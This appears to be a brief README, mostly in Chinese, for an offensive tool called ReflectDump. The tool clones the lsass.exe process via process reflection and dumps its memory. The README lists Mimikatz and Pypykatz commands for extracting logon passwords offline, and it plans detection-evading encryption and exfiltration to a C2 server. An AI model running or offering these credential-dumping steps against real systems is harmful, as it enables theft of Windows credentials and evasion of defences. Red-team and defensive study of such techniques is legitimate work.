此工具利用 RtlCreateProcessReflection API 的进程分叉(Process Forking)技术来克隆 lsass.exe 进程。创建克隆后,使用 MINIDUMP_CALLBACK_INFORMATION 回调为克隆进程生成内存转储。
只需执行编译后的文件。
ReflectDump.exe
使用 Mimikatz 或 Pypykatz 离线解析转储文件。
sekurlsa::minidump [filename] sekurlsa::logonpasswords
pypykatz lsa minidump [filename]
* Encrypt dump before writing on disk to bypass static detection.
* Exfiltrate on C2 Server
本仓库提供的内容仅用于教育和信息目的。
https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass